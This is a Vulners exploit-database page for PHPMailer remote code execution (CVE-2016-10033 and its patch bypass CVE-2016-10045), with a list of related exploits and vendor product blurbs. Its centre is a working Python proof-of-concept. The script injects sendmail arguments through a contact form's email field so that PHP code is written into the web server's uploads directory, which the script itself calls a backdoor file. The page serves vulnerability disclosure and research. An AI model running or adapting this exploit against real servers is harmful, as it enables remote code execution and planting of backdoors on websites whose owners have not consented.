Vulners
Lucene search
PHPMailer < 5.2.20 Remote Code Execution (0day Patch Bypass/exploit) (CVE-2016-10045)
| Reporter | Title | Published | Views | Family All 186 |
|---|---|---|---|---|
 | Exploit for Argument Injection in Phpmailer_Project Phpmailer | 10 May 201712:01 | – | githubexploit |
| Exploit for Argument Injection in Phpmailer_Project Phpmailer | 26 Mar 202613:28 | – | githubexploit |
| Exploit for Argument Injection in Phpmailer_Project Phpmailer | 10 May 201703:18 | – | githubexploit |
| Exploit for Argument Injection in Phpmailer_Project Phpmailer | 9 Feb 201814:53 | – | githubexploit |
| Exploit for Argument Injection in Phpmailer_Project Phpmailer | 26 Dec 201613:39 | – | githubexploit |
 | PHPMailer 5.2.17 - Remote Code Execution Exploit | 26 Dec 201600:00 | – | zdt |
| PHPMailer < 5.2.18 Remote Code Execution Vulnerability | 26 Dec 201600:00 | – | zdt |
| PHPMailer 5.2.20 - Remote Code Execution Exploit | 28 Dec 201600:00 | – | zdt |
| PHPMailer 5.2.18 - Remote Code Execution (Python) Exploit | 29 Dec 201600:00 | – | zdt |
| PHPMailer Sendmail Argument Injection Exploit | 4 Jan 201700:00 | – | zdt |
10
#!/usr/bin/python
#PHPMailer_RCE_exploit.pl
intro = """
PHPMailer RCE PoC Exploits
PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)
Discovered and Coded by:
Dawid Golunski
@dawid_golunski
https://legalhackers.com
"""
usage = """
Usage:
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt
PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Disclaimer:
For testing purposes only. Do no harm.
"""
import time
import urllib
import urllib2
import socket
import sys
RW_DIR = "/var/www/html/uploads"
url = 'http://VictimWebServer/contact_form.php' # Set destination URL here
# Choose/uncomment one of the payloads:
# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR
# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR
######################################
# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"
post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Dec 2016 00:00Current
10.4High risk
Vulners AI Score10.4
EPSS0.99714